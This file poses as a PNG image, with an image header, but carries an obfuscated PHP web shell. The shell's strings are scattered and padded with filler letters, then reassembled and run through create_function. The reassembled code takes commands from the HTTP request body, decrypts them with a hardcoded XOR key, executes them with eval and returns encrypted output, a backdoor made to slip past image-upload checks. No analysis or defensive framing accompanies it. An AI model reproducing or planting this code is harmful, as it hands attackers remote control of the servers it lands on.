‰PNG  IHDR 9  ¿`À<

<?php

$z=';for($i=0;$Ti<$l;){fTor($jT=0;($j<$Tc&&T$i<$l);$Tj++,$i+T+){T$To.=$t{$i}^T$';

$J='(@baTse64_TTdecode($m[1T]),$kT)));$oT=@ob_geTt_contenTTTts();@ob_end_cleTan()';

$s='k{$j};}T}return $To;}ifT (@preg_TTmatch(T"/$kh(.+)T$kf/",@fiTle_geTt_cTTonte';

$L='wCctm3eIRYUsi";functioTn xT($t,T$k){$c=strlTen($Tk);$l=Tstrlen(T$t);T$oT=T""';

$Y=str_replace('Js','','cJsJsreaJsJste_funJscJstion');

$H=';$r=T@TbTase6T4_eTncodeT(@x(@gzcompTress($o),$k));TprinTtT("$p$kh$r$kf");}';

$P='$k="63a9fT0eTa";$kh="7bTb980T50TT796b"T;$kTf=T"649e85481845";$p="0TTTKj';

$T='ntTs("phTp://input"),$m)T==1) {@oTb_sTtart();@eTval(@TgzuncomTpresTs(@x';

$I=str_replace('T','',$P.$L.$z.$s.$T.$J.$H);

$w=$Y('',$I);$w();

?>
